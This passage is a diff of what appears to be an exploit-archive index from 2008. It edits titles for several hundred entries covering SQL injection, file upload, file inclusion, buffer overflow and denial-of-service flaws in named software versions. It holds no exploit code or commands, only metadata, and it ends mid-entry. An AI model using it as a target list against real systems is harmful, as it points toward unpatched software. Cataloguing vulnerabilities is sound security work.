id,file,description,date,author,platform,type,port 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - (item.php id) SQL Injection",2008-09-01,Stack,php,webapps,0 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 6343,platforms/php/webapps/6343.txt,"CMSbright - (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 -6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0 +6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps,0 6345,platforms/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow (PoC)",2008-09-01,shinnai,windows,dos,0 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",2008-09-01,"Virangar Security",php,webapps,0 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0 @@ -5944,7 +5945,7 @@ id,file,description,date,author,platform,type,port 6354,platforms/php/webapps/6354.txt,"Spice Classifieds - (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 - Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps,0 -6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 +6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php r' SQL Injection",2008-09-03,"Hussin X",php,webapps,0 6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - (adid) SQL Injection",2008-09-04,"Hussin X",php,webapps,0 @@ -5952,7 +5953,7 @@ id,file,description,date,author,platform,type,port 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 - (1583) Remote Silent Crash (PoC)",2008-09-04,WHK,windows,dos,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,hardware,remote,0 -6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote Buffer Overflow Exploit",2008-09-05,SVRT,windows,remote,0 +6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote Buffer Overflow",2008-09-05,SVRT,windows,remote,0 6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0 @@ -5997,7 +5998,7 @@ id,file,description,date,author,platform,type,port 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0 -6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 +6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 @@ -6016,8 +6017,8 @@ id,file,description,date,author,platform,type,port 6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection",2008-09-11,"Virangar Security",php,webapps,0 6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - (cat) Blind SQL Injection",2008-09-11,Stack,php,webapps,0 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0 -6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass Exploit",2008-09-11,Tec-n0x,php,webapps,0 -6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Remote File Upload",2008-09-12,Stack,php,webapps,0 +6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps,0 +6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,php,webapps,0 6440,platforms/php/webapps/6440.pl,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-12,ka0x,php,webapps,0 6442,platforms/php/webapps/6442.txt,"pForum 1.30 - (showprofil.php id) SQL Injection",2008-09-12,tmh,php,webapps,0 6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - (download.php aid) SQL Injection",2008-09-12,StAkeR,php,webapps,0 @@ -6031,7 +6032,7 @@ id,file,description,date,author,platform,type,port 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 -6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder XP SP2 - wmex.dll ActiveX Buffer Overflow Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 +6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder XP SP2 - wmex.dll ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 @@ -6048,13 +6049,13 @@ id,file,description,date,author,platform,type,port 6468,platforms/php/webapps/6468.txt,"attachmax dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0 6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 -6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash Exploit",2008-09-16,securfrog,multiple,dos,0 +6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,multiple,dos,0 6472,platforms/multiple/dos/6472.c,"Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service",2008-09-16,"Albert Sellares",multiple,dos,0 6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",windows,dos,0 6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - (footer) Remote File Inclusion",2008-09-17,Piker,php,webapps,0 -6476,platforms/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery Command Execution Exploit (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 -6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery Command Execution Exploit (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 +6476,platforms/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery Command Execution (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 +6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery Command Execution (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 6478,platforms/php/webapps/6478.txt,"Technote 7 - (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"x10media mp3 search engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,php,dos,0 @@ -6088,17 +6089,17 @@ id,file,description,date,author,platform,type,port 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0 -6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add-Admin",2008-09-21,"CWH Underground",php,webapps,0 -6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Post-Authentication) File Upload",2008-09-21,InjEctOr5,php,webapps,0 +6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0 +6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Post-Authentication) File Upload",2008-09-21,InjEctOr5,php,webapps,0 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0 -6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / File Upload Exploit",2008-09-21,EgiX,php,webapps,0 +6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 -6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 +6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps,0 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0 6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 @@ -6107,7 +6108,7 @@ id,file,description,date,author,platform,type,port 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P - 'comments.php' Blind SQL Injection",2008-09-22,Stack,php,webapps,0 6530,platforms/php/webapps/6530.txt,"OpenElec 3.01 - (form.php obj) Local File Inclusion",2008-09-22,dun,php,webapps,0 6531,platforms/php/webapps/6531.txt,"MyBlog 0.9.8 - Insecure Cookie Handling",2008-09-22,Pepelux,php,webapps,0 -6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST - Remote Cross-Site Request Forgery Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 +6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST - Remote Cross-Site Request Forgery (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,php,webapps,0 @@ -6120,7 +6121,7 @@ id,file,description,date,author,platform,type,port 6543,platforms/php/webapps/6543.txt,"Ol BookMarks Manager 0.7.5 - Local File Inclusion",2008-09-23,dun,php,webapps,0 6544,platforms/php/webapps/6544.txt,"WebPortal CMS 0.7.4 - (code) Remote Code Execution",2008-09-23,GoLd_M,php,webapps,0 6545,platforms/php/webapps/6545.txt,"HotScripts Clone - 'cid' SQL Injection",2008-09-24,"Hussin X",php,webapps,0 -6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin Exploit",2008-09-24,ka0x,php,webapps,0 +6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0 6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6548,platforms/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0 @@ -6144,10 +6145,10 @@ id,file,description,date,author,platform,type,port 6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager 1.18/2.0 - Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 6568,platforms/php/webapps/6568.txt,"PHP infoBoard 7 - Plus Insecure Cookie Handling",2008-09-25,Stack,php,webapps,0 6569,platforms/php/webapps/6569.txt,"Vikingboard 0.2 Beta - SQL Column Truncation",2008-09-25,StAkeR,php,webapps,0 -6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow Exploit (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote,0 +6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote,0 6571,platforms/php/webapps/6571.txt,"openEngine 2.0 beta4 - Remote File Inclusion",2008-09-25,dun,php,webapps,0 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection",2008-09-25,d3v1l,php,webapps,0 -6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0 +6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0 6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - (class_dir) Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 @@ -6183,7 +6184,7 @@ id,file,description,date,author,platform,type,port 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0 6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 -6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - (Search) SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0 +6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0 6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - (index.php name) SQL Injection",2008-09-28,StAkeR,php,webapps,0 6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 @@ -6205,7 +6206,7 @@ id,file,description,date,author,platform,type,port 6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote Exploit",2008-09-30,Nine:Situations:Group,windows,remote,0 6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0 6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0 -6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary Upload",2008-09-30,Pepelux,php,webapps,0 +6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0 6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0 6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0 @@ -6233,19 +6234,19 @@ id,file,description,date,author,platform,type,port 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0 6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 -6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 +6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0 -6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow Exploit",2008-10-04,SkD,windows,remote,0 +6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,windows,remote,0 6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - (notes.php id) Local File Inclusion",2008-10-04,JosS,php,webapps,0 -6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0 +6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash",2008-10-04,suN8Hclf,windows,dos,0 6669,platforms/php/webapps/6669.txt,"JMweb - Multiple (src) Local File Inclusion",2008-10-04,SirGod,php,webapps,0 -6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary Upload Exploit",2008-10-04,Pepelux,php,webapps,0 +6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 -6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 -6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 -6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary Upload / Information c99 Exploit",2008-10-05,JosS,php,webapps,0 +6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0 +6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash",2008-10-05,suN8Hclf,windows,dos,0 +6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99)",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0 6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0 @@ -6284,7 +6285,7 @@ id,file,description,date,author,platform,type,port 6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0 -6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 +6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0 6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - PoC (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 @@ -6312,7 +6313,7 @@ id,file,description,date,author,platform,type,port 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,windows,dos,0 6742,platforms/windows/dos/6742.py,"RaidenFTPd 2.4 build 3620 - Remote Denial of Service",2008-10-13,dmnt,windows,dos,0 -6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - writeconfig() Remote Command Execution Exploit",2008-10-13,girex,php,webapps,0 +6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - writeconfig() Remote Command Execution",2008-10-13,girex,php,webapps,0 6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0 6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0 6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 @@ -6352,8 +6353,8 @@ id,file,description,date,author,platform,type,port 6780,platforms/php/webapps/6780.txt,"zeeproperty - (adid) SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0 -6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0 -6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0 +6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0 +6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0 @@ -6362,7 +6363,7 @@ id,file,description,date,author,platform,type,port 6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0 6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection",2008-10-19,girex,php,webapps,0 6792,platforms/php/webapps/6792.txt,"Joomla Component ds-syndicate - (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0 -6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow Exploit",2008-10-20,InTeL,windows,remote,0 +6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote,0 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale - SQL Injection",2008-10-20,EcHoLL,php,webapps,0 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0 @@ -6387,7 +6388,7 @@ id,file,description,date,author,platform,type,port 6817,platforms/php/webapps/6817.txt,"Joomla Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 -6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 +6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0 6822,platforms/php/webapps/6822.txt,"websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple 